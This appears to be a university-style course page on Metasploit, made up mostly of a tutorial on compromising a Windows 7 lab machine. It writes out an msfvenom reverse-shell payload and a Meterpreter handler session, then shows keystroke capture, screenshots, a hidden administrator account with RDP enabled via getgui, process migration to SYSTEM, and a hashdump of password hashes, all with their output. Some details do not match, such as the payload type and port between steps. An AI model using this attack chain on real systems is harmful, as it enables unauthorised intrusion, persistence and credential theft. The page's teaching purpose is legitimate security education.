[ Log On ]
  • Home
  • Tst
  • Cha
  • Enc
  • Code
  • IP
  • Fun
  • Sub
  • DigF
  • Cis
  • Com
  • Db
  • About
  • Netsim

Metasploit

Objectives

[Back] The key objectives of this chapter are:

  • Understand how a Pen Tester can generate vulnerabilities and test using the Metasploit framework.
  • Define the options and payloads required to generate and use vulnerabilities.
  • Gaining remote access.

Lecture

Tests

  • The test for this unit is Test.
  • The fun test for this unit is Test.

Related Material

  • Exploiting Android with Metasploit. Go.
  • Exploiting Android with Metasploit (Webview). Go.
  • Exploiting Windows/Mac OS X with Metasploit. Go.
  • Remote Desktop Windows/Mac OS X with Metasploit. Go.
  • Internet of Things Security. Go.
  • Metasploit (Enumeration and Scanning). Go.

Slides

The slides for the chapter are [here]

Tutorial

This article shows how to create a remote desktop in Windows 7 using Metasploit. The attacker uses a reverse TCP connection to make a call-back to the attacking host. In this case the attacking host is at 10.200.0.208.

Creating the Vulnerability

The vulnerability will create a call-back from the Windows 7 instance to Metasploit. So if the attacking host is at 10.200.0.208 (and the attacked host is at 10.200.0.205), and we callback on port 1234, then we create the exploit with:

msfvenom -p windows/shell_reverse_tcp LHOST=10.200.0.208 LPORT=1234 -f exe  > winexp.exe

Next we would save this to the instance.

Using Metasploit

Once the exploit is on the device, we can use Metasploit to compromise it. To start the Metasploit console from Kali we run:

msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.200.0.208
LHOST => 10.200.0.208
msf exploit(handler) > set LPORT 1234
LPORT => 1234
msf exploit(handler) > exploit

[*] Started reverse handler on 10.200.0.208:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.200.0.205
[*] Meterpreter session 1 opened (10.200.0.208:4444 -> 10.200.0.205:49265) at 2015-01-01 16:54:07 -0500

We can capture keystrokes with:

meterpreter > keyscan_start
Starting the keystroke sniffer...

meterpreter > keyscan_dump
Dumping captured keystrokes...
hello

meterpreter > keyscan_stop

Next run a process:

meterpreter > execute -f calc.exe
Process 3780 created.

meterpreter > screenshot
Screenshot saved to: /root/zJVqTTaq.jpeg

meterpreter > getuid
Server username: Encase-PC1\Encase

meterpreter > sysinfo
Computer        : ENCASE-PC1
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_GB
Meterpreter     : x86/win32

meterpreter > getsid
Server SID: S-1-5-21-3026846657-1272420173-2154099446-1000


meterpreter > ifconfig
Interface 13
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:50:56:ab:68:00
MTU          : 1500
IPv4 Address : 10.200.0.205
IPv4 Netmask : 255.255.255.0

Next we can create a new user (with getgui -u "user" -p "password"), and enable a remote desktop (with getgui -e):

meterpreter > run getgui -u newuser -p pass
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] 	Adding User: newuser with Password: pass
[*] 	Hiding user from Windows Login screen
[*] 	Adding User: hacker to local group 'Remote Desktop Users'
[*] 	Adding User: hacker to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4028.rc

meterpreter > run getgui -e

[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] 	RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] 	The Terminal Services service is not set to auto, changing it to auto ...
[*] 	Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4353.rc

0.200.0.205 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(handler) > exit

We can then call-up the remote desktop with:

root@kali:~# rdesktop -u newuser -p pass 10.200.0.205
WARNING: Remote desktop does not support colour depth 24; falling back to 16

Now let's get the password hash values.

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

meterpreter > getuid
Server username: Encase-PC1\Encase

We do not have the privilege to get the password hashes, so we locate a process which has a high privilege, and migrate it:

meterpreter > ps

Process List
============

 PID  PPID Name             Arch    Session  User                          Path
 ---  ---- ----             ----    -------  ----                          ----
 0    0    [System Process          42949                               
 4    0    System           x86_64  0                                         
 264  4    smss.exe         x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..\smss.exe
 364  524  svchost.exe      x86_64  0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\..\svchost.exe
 372  364  csrss.exe        x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..\csrss.exe
 388  524  spoolsv.exe      x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..spoolsv.exe
 420  364  wininit.exe      x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..\wininit.exe
 524  420  services.exe     x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..\services.exe
 532  420  lsass.exe        x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..\lsass.exe
 540  420  lsm.exe          x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..lsm.exe
 632  524  svchost.exe      x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..\svchost.exe

 708  524  svchost.exe      x86_64  0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\..\svchost.exe
 788  524  svchost.exe      x86_64  0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\..\svchost.exe
 832  524  svchost.exe      x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..\svchost.exe
 856  524  svchost.exe      x86_64  0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\..\svchost.exe

meterpreter > migrate 832
[*] Migrating from 2436 to 832...
[*] Migration completed successfully.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Encase:1000:aad3b435b51404eeaad3b435b51404ee:307e40814e7d4e103f6a69b04ea78f3d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::